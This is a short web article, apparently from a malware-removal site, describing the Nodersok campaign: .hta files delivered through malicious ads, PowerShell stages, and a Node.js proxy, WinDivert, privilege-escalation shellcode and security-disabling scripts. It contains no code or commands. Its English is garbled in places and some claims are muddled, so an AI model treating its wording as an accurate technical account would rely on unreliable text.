Description Of Nodersok
Many cyber crooks are talking about an interest in hacking techniques known as LOLBins (Living-Off-the-Land Binaries). This is becoming very popular in these days it is because it allows cyber criminals to bypass anti-malware tools inorder to make their threatening campaigns carried out via legitimate services and applications which moreover helps the operators to remain under the radar. Malware researchers have recently spotted a new threat that employs the LOLBins techniques which are executed at every phase of the attack making the Nodersok looks like a threat which operates very silently.
The creators of the Nodersok threat are using it inorder to infect hosts and turn them into proxy servers by injecting them with a proxy script known as Node.JS framework. It isn't very clear what exactly they plan on doing with the infiltrated machines but it is likely that they perhaps used as a part of the fast-growing infrastructure of the creators of Nodersok or simply employed in huge spam email campaigns.
The activity of the Nodersok is mainly concentrated in the United States and Europe. It has been reported already that the victims are in the thousands which is rather impressive. Cyber security experts have estimated that nearly 3% of the infected hosts belong to corporations which means that almost all the computer system that have fallen victim of the Nodersok malware belongs to regular users.
The Nodersok threat executes a few tasks as a part of its attack such as:
- The corrupted ads deliver a “.hta” file which hosted on a genuine cloud service to the user.
- Once the second file infiltrates into the computer system, it'll begin a decryption process which will unlock a PowerShell command.
- The revealed PowerShell command will enable the threat to plant additional LOLBins on the host.
If the Nodersok threat is successful and manages to download the extra LOLBins, the user in a upright feels a bit of trouble with these tools include:
- The previously mentioned Node.JS framework.
- A module which is related to the Node.JS framework, allows the operators to turn the host into a dormant proxy server.
- A network of packets capturing kit is called Windivert.
- A shellcode allows the attackers to gain administrator privileges on the infected host.
- A PowerShell script makes sure the none of the Windows security tools are functioning as long as the Nodersok malware is present on the computer system.
Ensure you download and install a reputable anti-virus software suite which will help you to remove the Nodersok malware from your computer system safely.